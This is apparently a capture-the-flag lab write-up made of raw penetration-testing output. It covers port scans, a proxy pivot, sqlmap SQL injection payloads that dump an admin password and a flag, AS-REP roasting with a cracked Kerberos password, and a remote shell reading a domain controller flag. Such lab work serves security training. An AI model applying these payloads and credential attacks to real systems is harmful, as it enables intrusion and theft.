[~] The config file is expected to be at "/root/.rustscan.toml" [~] Automatically increasing ulimit value to 5000. Open 39.98.127.114:22 [~] Starting Script(s) [~] Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-21 00:50 -0500 Initiating Ping Scan at 00:50 Scanning 39.98.127.114 [4 ports] Completed Ping Scan at 00:50, 0.58s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 00:50 Completed Parallel DNS resolution of 1 host. at 00:50, 1.50s elapsed DNS resolution of 1 IPs took 1.50s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 2, CN: 0] Initiating SYN Stealth Scan at 00:50 Scanning 39.98.127.114 [1 port] Discovered open port 22/tcp on 39.98.127.114 Completed SYN Stealth Scan at 00:50, 0.07s elapsed (1 total ports) Nmap scan report for 39.98.127.114 Host is up, received reset ttl 128 (0.48s latency). Scanned at 2026-02-21 00:50:47 EST for 0s
PORT STATE SERVICE REASON 22/tcp open ssh syn-ack ttl 128
Read data files from: /usr/share/nmap Nmap done: 1 IP address (1 host up) scanned in 2.26 seconds Raw packets sent: 5 (196B) | Rcvd: 256 (10.244KB)
PORT STATE SERVICE VERSION 7687/tcp open websocket Neo4j Bolt protocol Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: WAP|general purpose Running: Actiontec embedded, Linux 2.4.X OS CPE: cpe:/h:actiontec:mi424wr-gen3i cpe:/o:linux:linux_kernel cpe:/o:linux:linux_kernel:2.4.37 OS details: Actiontec MI424WR-GEN3I WAP, DD-WRT v24-sp2 (Linux 2.4.37) Network Distance:2 hops
TRACEROUTE (using port 80/tcp) HOP RTT ADDRESS 10.10 ms 192.168.21.2 20.18 ms 39.98.127.114
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done:1 IP address (1 host up) scanned in19.77 seconds
开放7687端口,Google一下发现是neo4j的端口
但是没有找到利用点。
重新用nmap的全端口扫描扫了一下端口
1 2 3 4 5 6 7 8 9 10 11 12 13
Nmap scan report for39.98.127.114 Host is up (0.00031s latency). Not shown: 65378 filtered tcp ports (no-response), 151 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 1337/tcp open waste 7473/tcp open rise 7474/tcp open neo4j 7687/tcp open bolt 36565/tcp openunknown
┌──(root㉿kaada)-[/home/kali/Desktop] └─# nmap -p22,1337,7473,7474,7687,36565 39.98.127.114 -sC -sV -T4 -A Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-2101:14-0500 Stats:0:00:24 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan Service scan Timing: About 83.33% done; ETC:01:14 (0:00:05 remaining) Nmap scan report for 39.98.127.114 Host is up (0.0087s latency).
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 307258:b7:39:23:b4:4c:fe:9e:50:62:e3:91:95:fa:fd:33 (RSA) | 25644:aa:03:c8:b7:af:9d:96:c5:3d:17:1b:1c:f3:45:c0 (ECDSA) |_ 256 a3:d8:bc:f2:60:54:67:3e:a8:a7:ab:00:47:57:34:2e (ED25519) 1337/tcp open java-rmi Java RMI | rmi-dumpregistry: | shell | implements java.rmi.Remote, org.neo4j.shell.ShellServer, | extends | java.lang.reflect.Proxy | fields | Ljava/lang/reflect/InvocationHandler; h | java.rmi.server.RemoteObjectInvocationHandler | @39.98.127.114:36565 | extends |_ java.rmi.server.RemoteObject 7473/tcp open ssl/http Jetty |_ssl-date: TLS randomness does not represent time |_http-cors: HEAD GET POST DELETE TRACE OPTIONS PATCH |_http-title: Site doesn't have a title (application/json;charset=utf-8). | ssl-cert:Subject: commonName=localhost | Not valid before:2021-06-28T08:56:44 |_Not valid after:9999-12-31T23:59:59 7474/tcp open http Jetty |_http-title: Site doesn't have a title (application/json;charset=utf-8). |_http-cors: HEAD GET POST PUT DELETE TRACE OPTIONS 7687/tcp open websocket Neo4j Bolt protocol 36565/tcp open java-rmi Java RMI Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: WAP Running: Actiontec embedded, Linux OS CPE: cpe:/h:actiontec:mi424wr-gen3i cpe:/o:linux:linux_kernel OS details: Actiontec MI424WR-GEN3I WAP Network Distance:2 hops Service Info:OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp) HOP RTT ADDRESS 10.24 ms 192.168.21.2 20.26 ms 39.98.127.114
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done:1 IP address (1 host up) scanned in33.52 seconds
help Show help information detail Display connected nodes' detail topo Display nodes' topology use <id> Select the target node you want to use exit Exit Stowaway (admin) >> use 0 (node 0) >> socks 8888 [*] Trying to listen on 0.0.0.0:8888...... [*] Waiting for agent's response...... [*] Socks start successfully! (node 0) >>
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 02:09:30 /2026-02-21/
[02:09:30] [INFO] parsing HTTP request from '1.req' [02:09:30] [INFO] testing connection to the target URL [proxychains] Strict chain ... 38.55.99.145:8888 [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 ... 172.22.6.38:80 ... OK ... OK [02:09:31] [INFO] testing if the target URL content is stable [02:09:31] [INFO] target URL content is stable8888 ... 172.22.6.38:80 [02:09:31] [INFO] testing if POST parameter 'username' is dynamic [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 ... OK ... OK [02:09:31] [WARNING] POST parameter 'username' does not appear to be dynamic [02:09:31] [WARNING] heuristic (basic) test shows that POST parameter 'username' might not be injectable [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 ... OK ... OK [02:09:33] [INFO] testing for SQL injection on POST parameter 'username' [02:09:33] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 ... OK ... OK [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 ... OK ... OK [02:09:35] [INFO] testing 'Boolean-based blind - Parameter replace (original value)' [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 ... OK ... OK [02:09:36] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)' [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 ... OK ... OK [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 ... OK ... OK [02:09:38] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 ... OK ... OK [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 ... OK [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 ... OK ... OK [02:09:41] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)' [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 ... OK ... OK [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 ... OK ... OK [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 ... OK ... OK [02:09:44] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 ... OK ... OK [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 ... OK ... OK [02:09:47] [INFO] testing 'Generic inline queries' ... 172.22.6.38:80 [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 ... OK ... OK [02:09:48] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 ... OK ... OK [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 ... OK ... OK [02:09:50] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 ... OK ... OK [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 ... OK ... OK [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 ... OK ... OK [02:10:00] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 ... OK ... OK [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 ... OK ... OK [02:10:01] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 ... OK ... OK [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 ... OK ... OK [02:10:21] [INFO] POST parameter 'username' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y [02:10:30] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' [02:10:30] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 ... OK ... OK [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 ... OK ... OK [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 ... OK ... OK [proxychains] Strict chain ... 38.55.99.145:8888 [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 ... OK [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 ... OK [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 ... 172.22.6.38:80 ... OK ... OK [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 ... OK ... OK [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 ... OK ... OK [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 ... OK ... OK [proxychains] Strict chain ... 38.55.99.145:8888 [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 ... OK ... 172.22.6.38:80 [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 ... OK ... OK [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 ... OK ... OK [02:10:42] [INFO] target URL appears to be UNION injectable with 3 columns [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 ... OK ... OK [02:10:43] [WARNING] reflective value(s) found and filtering out6.38:80 [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 ... OK ... OK [02:10:52] [INFO] POST parameter 'username' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n sqlmap identified the following injection point(s) with a total of 70 HTTP(s) requests: --- Parameter: username (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: username=admin' AND (SELECT 8912 FROM (SELECT(SLEEP(5)))UejQ) AND 'ioQk'='ioQk&password=123
Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: username=admin' UNION ALL SELECT NULL,CONCAT(0x7162767071,0x5473526c4649526472784b6d455a555743756f76764850586f42736b4c48757a4f74527558644e45,0x71716b6271),NULL-- -&password=123 --- [02:10:55] [INFO] the back-end DBMS is MySQL [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 [proxychains] Strict chain ... 38.55.99.145:8888 ... OK ... 172.22.6.38:80 ... OK [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 ... OK ... OK [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 ... OK ... OK [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 [proxychains] Strict chain ... 38.55.99.145:8888 ... OK ... 172.22.6.38:80 ... OK web server operating system: Linux Ubuntu 20.10 or 20.04 or 19.10 (eoan or focal) web application technology: Apache 2.4.41 back-end DBMS: MySQL >= 5.0.12 [02:11:03] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries [02:11:03] [INFO] fetching current database [02:11:03] [INFO] fetching tables for database: 'oa_db' 172.22.6.38:80 [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 ... OK ... OK [02:11:04] [INFO] fetching columns for table 'oa_admin' in database 'oa_db' [02:11:04] [INFO] fetching entries for table 'oa_admin' in database 'oa_db' [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 ... OK ... OK Database: oa_db Table: oa_admin [1 entry] +----+------------------+---------------+ | id | password | username | +----+------------------+---------------+ | 1 | bo2y8kAL3HnXUiQo | administrator | +----+------------------+---------------+
[02:11:09] [INFO] table 'oa_db.oa_users' dumped to CSV file '/root/.local/share/sqlmap/output/172.22.6.38/dump/oa_db/oa_users.csv' [02:11:09] [INFO] fetching columns for table 'oa_f1Agggg' in database 'oa_db' [02:11:09] [INFO] fetching entries for table 'oa_f1Agggg' in database 'oa_db' [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.38:80 ... OK ... OK Database: oa_db Table: oa_f1Agggg [1 entry] +----+--------------------------------------------+ | id | flag02 | +----+--------------------------------------------+ | 1 | flag{b142f5ce-d9b8-4b73-9012-ad75175ba029} | +----+--------------------------------------------+
[02:11:10] [INFO] table 'oa_db.oa_f1Agggg' dumped to CSV file '/root/.local/share/sqlmap/output/172.22.6.38/dump/oa_db/oa_f1Agggg.csv' [02:11:10] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/172.22.6.38'
[-] User weishengshan doesn't have UF_DONT_REQUIRE_PREAUTH set [proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.12:88 ... OK $krb5asrep$23$zhangxin@XIAORANG.LAB:3ff52ceb3c117bcf7e39e29a56ee4a20$c7b6c7c1155f5774978a46d50a9ca3fd44642effcac658f6323a7d39c26d559cf21ed5e37208df2af683362508c089e875a76cfad067181583a8404e1cecaac2c2d924e6075ad70b575389a93804df8edae1ec662712da703d594ed16dcc338f90b53b93d6c194816ceb29c1ed7bf88987e0804899bdd205f439ecec51e248418715eaa6af4e730f617e07d2ec4dd54f1774742ec8014add78bee555b46cadb45670ca29f6c94771005443b383b170840e79718b025cc78110e6907748a92309c1d03ce8e79dab15e62f0a8e06f293c39fa2731cd04f7a5ce6ecc299c1df587dcb5b37fcca5e42bc675b74e7
┌──(root㉿kaada)-[/home/kali/Desktop] └─# john --format=krb5asrep --wordlist=/usr/share/wordlists/rockyou.txt zhangxin_hash.txt Usingdefaultinputencoding: UTF-8 Loaded 1password hash (krb5asrep, Kerberos 5AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x]) Will run 4 OpenMP threads Press 'q'or Ctrl-C toabort, almost any other key for status strawberry ($krb5asrep$23$zhangxin@XIAORANG.LAB) 1g 0:00:00:00 DONE (2026-02-21 02:18) 50.00g/s 51200p/s 51200c/s 51200C/s 123456..bethany Use the "--show" option to display all of the cracked passwords reliably Session completed.
Maybe you can find something interesting on this server. ======================================= What you may not know is that many objects in this domain are moved from other domains.
[proxychains] Strict chain ... 38.55.99.145:8888 ... 172.22.6.12:445 ... OK [!] Launching semi-interactive shell - Careful what you execute C:\Windows\system32>type C:\Users\Administrator\flag\flag04.txt Awesome! you got the final flag.